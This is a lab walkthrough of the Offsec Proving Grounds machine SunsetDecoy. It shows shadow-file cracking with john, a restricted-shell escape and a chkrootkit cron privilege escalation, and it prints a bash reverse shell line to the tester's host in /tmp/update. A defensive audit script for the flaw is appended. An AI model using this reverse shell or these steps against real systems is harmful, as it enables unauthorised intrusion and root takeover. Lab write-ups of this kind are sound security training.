# Offsec Proving Grounds - SunsetDecoy Walkthrough

#### Machine Details

#### Name: SunsetDecoy
#### IP address: 192.168.66.85
#### Difficulty: Easy
#### Points: 5

---

## In the beginning

As always, I started with an nmap scan and the result is shown below:

![](https://i.imgur.com/WhUfmeY.png)

There seem to be two services running: SSH on port 22 and HTTP on port 80. From the script enumeration, the HTTP service is serving a file named save.zip. So I proceeded to visit the IP address in the browser and downloaded the save.zip file.

![](https://i.imgur.com/DhFKkUS.png)

Unzipping this file, it contains some Linux files such as passwd, shadow, etc.

![](https://i.imgur.com/3iFDtQo.png)

## Come out of the shadows

Since both the passwd and shadow files are provided, I used the unshadow command to merge them and cracked the hashes with john. I was able to find the password for a user whose username is a long string.

```
unshadow passwd shadow > crack.txt
john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

Found password 296640a3b825115a47b68fc44501c82:server
```

## We're in!

Now I was able to log into the box via SSH, but I was greeted with a restricted shell.

![](https://i.imgur.com/l9L7EjC.png)

### Oh my! Not another jail escape

To break out of this shell, I used the following command:

```
ssh 296640a3b825115a47b68fc44501c82@192.168.66.85 -t "bash --noprofile"
```

but I still could not run commands. This was because the $PATH was set to the user's home directory and the commands I was running were not in that directory. To fix this, I had to export the correct path to the binaries, and then I could run commands.

```
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```

![](https://i.imgur.com/aOZ5OVr.png)

As usual, I first checked if I could run commands with sudo on the box, but it turns out the user is not in the sudoers file.
![](https://i.imgur.com/hAmCyco.png)

### I see you, honeypot

In the user's home directory, one of the files that caught my attention was the honeypot.decoy file. To find out what the file does, I ran it and tried some of its functionalities.

![](https://i.imgur.com/p1l6wyf.png)

Most of the functionalities are basic Linux commands. The "Launch an AV scan" function says a scan will be run. So my thought process was to select that option and monitor the process to see what was being performed. To monitor the process, I opened another SSH session, uploaded [pspy64](https://github.com/DominicBreuker/pspy/releases) (since the box is x86_64) to the box, ran it in one session and ran the honeypot.decoy file in the other.

![](https://i.imgur.com/NkahbRj.png)

![](https://i.imgur.com/qmbUiZK.png)

## What's going on, processes

From the processes, I quickly noticed there is a cron task running the chkrootkit tool as root. Checking the chkrootkit version in use shows that it is vulnerable to a [Local Privilege Escalation](https://www.exploit-db.com/exploits/33899) exploit, and the advisory explains the procedure to follow to carry out the exploit. What I needed to do was to create a file named update inside the /tmp directory, make it executable and wait for the cron task to run it.

```
#!/bin/bash
bash -i >& /dev/tcp/192.168.49.66/9001 0>&1
```

![](https://i.imgur.com/onDzfYV.png)

When the cron task ran, I got a shell as root.

![](https://i.imgur.com/uref7ts.png)

BOOM!

###### tags: `offsec proving grounds` `sunsetdecoy` `chkrootkit` `local privilege escalation` `password cracking` `unshadow` `bypassing restricted shells`
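From the defender's side, the chkrootkit cron job described above is only dangerous because an executable `/tmp/update` can be planted and a root cron entry invokes chkrootkit. The following check is an added example, not part of the original walkthrough: it looks for exactly those two preconditions. The directory and crontab paths are parameters (defaults assumed: `/tmp`, `/etc/crontab` and `/etc/cron.d/*`) so it can be run against a test directory.

```shell
#!/usr/bin/env bash
# Added defensive check (not from the walkthrough): flags the conditions the
# chkrootkit privilege escalation relies on.

# Returns 0 (found) if a file named "update" exists in the given directory
# (default /tmp), printing its owner and mode; returns 1 if absent.
check_tmp_update() {
  local dir="${1:-/tmp}"
  local f="$dir/update"
  if [ ! -e "$f" ]; then
    return 1
  fi
  local owner perms
  owner=$(stat -c '%U' "$f" 2>/dev/null || echo '?')   # GNU stat assumed
  perms=$(stat -c '%A' "$f" 2>/dev/null || echo '?')
  printf 'FOUND %s (owner=%s mode=%s)\n' "$f" "$owner" "$perms"
  if [ -x "$f" ]; then
    printf 'WARNING: executable; a vulnerable chkrootkit run by root cron would execute it\n'
  fi
  return 0
}

# Returns 0 if any of the given crontab files (default: system crontab and
# /etc/cron.d) invokes chkrootkit, printing the matching lines; 1 otherwise.
cron_runs_chkrootkit() {
  if [ "$#" -eq 0 ]; then
    set -- /etc/crontab /etc/cron.d/*
  fi
  grep -Hs 'chkrootkit' "$@"
}

# Combined audit: exit status 0 means both preconditions are present.
audit_chkrootkit_exposure() {
  local dir="${1:-/tmp}"; shift || true
  local hit=0
  check_tmp_update "$dir" || hit=1
  cron_runs_chkrootkit "$@" || hit=1
  return "$hit"
}
```

Run `audit_chkrootkit_exposure` as root on the host; a zero exit status means the planted file and the root cron entry are both present and the job should be removed or chkrootkit updated.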